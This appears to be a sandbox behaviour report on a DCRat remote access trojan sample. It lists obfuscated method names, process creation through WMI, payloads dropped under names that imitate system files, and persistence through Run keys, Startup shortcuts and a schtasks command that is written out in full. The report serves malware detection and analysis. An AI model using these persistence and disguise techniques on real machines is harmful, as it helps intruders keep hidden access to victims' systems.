              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, YegRPiMFsvSTUy2Ptw0.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'Bj3wDklYlo', 'K0swcRCkRa', 'vCJwPxEkPp', 'yp6wBEStdG', 'hlewZb2Vmj', 'FBqdPmWP5U9iY1SFK3q', 'rKnFN1WMtAsxILn93HF', 'oE2fb4W49ox1DT1U1tq'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, Oqp2h45MbLWUyY0jC2l.csHigh entropy of concatenated method names: 'lM7HRQ9ITC', 'PqMHF9mYm1', '_8r1', 'mcPHi6Q2x4', 'ksfHfmPIU4', 'klrHxWFDok', 'fKhHgDyP6K', 'h31qF1tlvDMBBc4qvOb', 'jLZwZftwZ7rqKi6ixfe', 'wZRs8EtWuns3RF0TkEW'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uPfSZV53W3JdoE5DHk8.csHigh entropy of concatenated method names: 'qM7XNkc3Vc', 'WQkXnD5oeA', 'NmtXEvqHXH', 'QkTXqaJcu4', 'Op8XpBcY05', 'RknXh8VrsY', '_838', 'vVb', 'g24', '_9oL'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, KbcJCiXXRFZqdFTya1b.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'RWZdmAINqpWL63JJLFN', 'utPoQMIxVWQB5wXh59w', 'ErQMSOIQxIKLGvZqytP', 'lw8HkNI94AilQwJp17Y', 'OHw4kSIjcf2se1itVv4', 'V1dlrEIZ4yLOupYocol'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, DkrhvAkKQqbxVpf8sH6.csHigh entropy of concatenated method names: 'MLBp6VJr2q2FuGVHYUC', 'UcCI1CJ2ZatwrmC8h6l', 'FsUulOJoaTnjWcJTkrt', 'uF8tMdJTDlBnlM7gBa0', 'IWF', 'j72', 'KCli3w53G6', 'HQAi7WIDGG', 'j4z', 'u0fiL2niwR'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, M3xuuMru7yvhEBnL6WJ.csHigh entropy of concatenated method names: 'sY8YEn9dLh', 'oTaYqNthj9', 'vaSYpDBLoI', 'jHy4nqrtsuJLVaGuBmH', 'jium6ir20tb9x0apE3m', 'bY4SLArDMQBHiglT9GZ', 'pVbkbBrbTq3Mq8hwbu7', 'NLY78kruFMhaRra42OC', 'T7HdcwrRQqMreTCeuX8', 'TA7BH7rkrr0sfOKy12Y'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, deeUvwDr1F0DQZu6DkX.csHigh entropy of concatenated method names: 'aYUx3fSue8', 'NSYy5ABUXilRqy94S45', 'Hje8g1BN0Wge0IhikWm', 'FrhEGXBwJWpXigapZue', 'wjTpJHBWVFXucXpkYJA', 'gUlivCSevW', 'vyxijcp6gk', 'jK4idsomhJ', 'dVhi2SbvUv', 'bAbiDeyID4'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, QG5wveM3LgkoM4utFO8.csHigh entropy of concatenated method names: 'THTGXd54g9', 'LlnGH5wW38', 'HFZGuN2Mgo', 'nv9BTD1dgwBKgByOLNj', 'y7fX8h18fEFCBgc8XqO', 'Onv1mq1oBLmQhg26G9W', 'Yrd5wn1TEMkNcyAEmG9', 'E7jAev1ryLaiPvkh729', 'zILvO712iw2MYYQe8uM', 'o7j94J1FOfS3efTjw4g'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ySyEcdMc0cni3Q58xjX.csHigh entropy of concatenated method names: 'od4KtMd6Yi', 'Y2lK8xg4k2', 'jCiKzoD0sQ', 'X16wTqpAsA', 'UwLwSyR5k7', 'oLFwGDe24B', 'reSwbGbcxO', 'MiHwKKbr6M', 'dTxwwj6hoI', 'oH920mliUAsW1ssDfOk'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, WHDInNVdHmUBgCtoi3.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'lRiwWhfWeGWb0mDrG9U', 'VbUZWgfUSbQvyaC9Pdv', 'ICG68jfN3L5tep3x9te', 'qe9ecBfxsxNcVLMCxHG', 'g2iXBifQjT1ktviJioY', 'LPXijIf9ZCCgMmrLF6Y'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PNKNrn423aLw7YTXAHt.csHigh entropy of concatenated method names: 'yucBDaMMP3ECX', 'vyn36Op7S1eDK6Fo3vm', 'pnZE9MplapgQxsowx5a', 'jENnnCpwTNPEY3Vp3hK', 'ihRwU9pWoLl7mLENj3c', 'aylK7HpUuVITtLZewJ3', 'ACAK56pGZ4qlfa905XL', 'jYtERip0o4e4prA4nqU', 'SmhZAJpNrGMGPNDmgmS', 'JUVss3pxOBiloqjaAk4'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, AnGUVdD2JESKqb0kjLg.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, vuI9WhDKcr3MwVZ4Abr.csHigh entropy of concatenated method names: 'PJ0yXvkQrk', 'c2xyuTMi4d', 'NrpykOciTD', 'dZNylap7gw', 'KvQyyJeyCO', 'VyfyUegaNa', 'gSMy3CSdEb', 'NAMy7HomTk', 'jUEyLnimSX', 'DHGyCFxrR9'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, GctDFZX41lS9Uo7uuCY.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'Uwr5vTIiWjwcYngGWgJ', 'EUOf6qIyRhpmwSklL7m', 'qtXKpFIXRMHDIQ694xi', 'ywMN29IvZpCnhPQB7UT', 'eHYtqUIV6jXNMrdXFGA', 'CHpih9IzPL6s86wDmCF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, SktYJqkXLPIuQ6Awout.csHigh entropy of concatenated method names: 'RtgW0UJt9s', 'RGpWvSvxAq', 'b3tWjZ0iKr', 'IdLWdrXJSJ', 'U8jTFMUzVvcqdI1HDjd', 'gqIyrTUvLaDLButUU8H', 'Rj60hxUVqjy7YSgvJ9G', 'L0Duk7N5w2id9lXCrtM', 'SGCSJpNaFDhAOPNv3yE', 'bKiUWeNmtNZykJXx0KV'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, mlk1UZXKuLKF5JDXCmf.csHigh entropy of concatenated method names: 'HGHGCC3pnt', 'PMFKAG1IJLMsJP3rFBV', 'DyTFnY148eUATHh7Dhw', 'g9ntY81fRStEYuH89Hk', 'uM31K61H2MmaPPqQadm', 'dgVBDP16hIGdOjUYfM0', '_5q7', 'YZ8', '_6kf', 'G9C'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, iRKR1nXyR9O1jxumahV.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'cHpum34egfeTIb4Sdnd', 'B0ZuOV4LPImaZwJi5Pg', 'GqSZAQ4ignGH9u1iMlC', 'Jc6Cm34yLoeihFSreTE', 'EFfQsp4XpefdbH3GNQd', 'H6FAd54v2U1f0BGelAZ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, wxlCxPkYywwxbY5Yf0k.csHigh entropy of concatenated method names: 'g7dFy6Ru26', 'lReFUD5c13', 'cyGF3XyeVy', 'e9682U9RXr0kVildrd2', 'fLRWS79bisoSP8SVcBf', 'btb3vu9u3Kp8mbLFUZJ', 'JxUxBY9kYiRotWnW9FZ', 'lH0FeK09an', 'hBkFWPSYgL', 'JrKFRdjvJJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, MsBg6K5RkP1uMJ0tCH3.csHigh entropy of concatenated method names: 'UvL0J4QlU4', '_1kO', '_9v4', '_294', 'fiN09k7ww6', 'euj', 'XqY0YcsQHH', 'IU70XKQPcs', 'o87', 'VDG0HBWOOJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, L7trMlXk084m2iRiuOD.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'BR8JGxIqowvt7Evqt19', 'keGBxsIFCHwBPCI5TN7', 'GSSyCmIAp3nSaWM96iD', 'ycCsxQIdyhWFEUgsE74', 'iZ8ZkAI8MLwxvQmFqlQ', 'zUuFbOIoXb5oGaNA3H6'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, svkKVPMTtQZgVyRGCYB.csHigh entropy of concatenated method names: 'kyJbtL3ClB', 'nx0b8UxLc4', 'A2hty50NULorsvmYhWY', 'H9mMBL0xEHgKSEnn91C', 'Ad1cMr0QfJVKsmbaAGZ', 'gmvSbw09DVsSVLAmhBR', 'Rfq8Lv0jNDScGRXA51l', 'adcMhi0ZY4tiPAm4qck', 'qWWd9F0JOsEahB0IXiB', 'tASqwt0B6pEBFET5id8'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ooLRuLDTQX9YMad3xl6.csHigh entropy of concatenated method names: 'H4jgKJkYAu', 'FHhgwE3xbA', 'HK2geNLcgF', 'nvs919nwtCcbuDT8nsk', 'gxZT8SnWWtulfk6mvda', 'uT6bbsn7Uwg26WXLo5F', 'vhSGs1nlEpxaj5Y1eCs', 'ytCVTinUVrwV5p5iGvR', 'jGRfplnNuYGdd7vWY61', 'Ja6i2inxwKKaSGQ0irC'

              Persistence and Installation Behavior

              barindex
              Creates processes via WMI
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Drops PE files with benign system names
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Recovery\csrss.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\Componenthost\providerreviewdhcp.exeJump to dropped file
              Source: C:\Users\user\Desktop\cougif6lqM.exeFile created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeJump to dropped file
              Source: C:\Users\user\Desktop\cougif6lqM.exeFile created: C:\Users\user\AppData\Local\Temp\javaclient.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Recovery\csrss.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Program Files\Windows Mail\WmiPrvSE.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Users\user\cmd.exeJump to dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Users\user\cmd.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Users\user\cmd.exeJump to dropped file
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JavaClientJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JavaClientJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
